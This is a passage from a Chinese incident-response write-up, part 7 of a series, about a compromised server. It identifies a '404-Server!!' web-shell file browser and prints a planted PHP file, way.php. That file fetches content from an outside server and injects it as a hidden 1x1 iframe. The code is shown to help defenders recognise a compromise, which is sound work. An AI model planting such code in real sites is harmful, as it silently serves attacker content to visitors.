经典案例
  • 妙视界
  • 广州市坊森室内装饰有限公司
  • ArtsRouge
  • 香港·维西·创意设计机构
  • 阳春冠军联盟
  • Management
  • 爱艺术咖啡会所

惨遭黑客入侵,记一次服务器被攻击的应急行动!(7)

发布于:2017-12-06 19:02来源:网络整理 作者:jimmoo 点击:

然而,谷歌搜索结果显示,这段代码与 404-server 有关联! !上传 Shell 并出现在相同的受损服务器上。因此,如果你在服务器上发现了这个代码,它可能是一个被攻击的标识,你应该进一步检查。

212.jpg

检查“404-Server!!”源代码使我得出结论,黑客提供了一个文件浏览器,它具有上传、查看和删除文件以及调整权限的功能。

通过检查这些文件的背后组织和开发者,我发现它们都是由PHP进程的所有者创建的,因此它们非常像 PHP 应用程序所创建的。

另一个被攻击的文件叫做 way.php,它只是包含了来自另一个服务器的文件:

  1. <?php

  2. $way = 'http://XXX.XXX.XXX.XXX/dir/index.php?52b019b=l3SKfPrfJxjFGMeDebmtF_FXPAzaHkyZxYufiaWSHJmkaWD8jvT5Sknh_QTIT1XW_r4';

  3. $fd = @file($way);

  4. if ($fd !== false)

  5. if (isset($fd[0]))

  6. echo(' <iframe src="'.$fd[0].'" width="1" height="1" ></iframe> ');

  7. ?>

------分隔线----------------------------
------分隔线----------------------------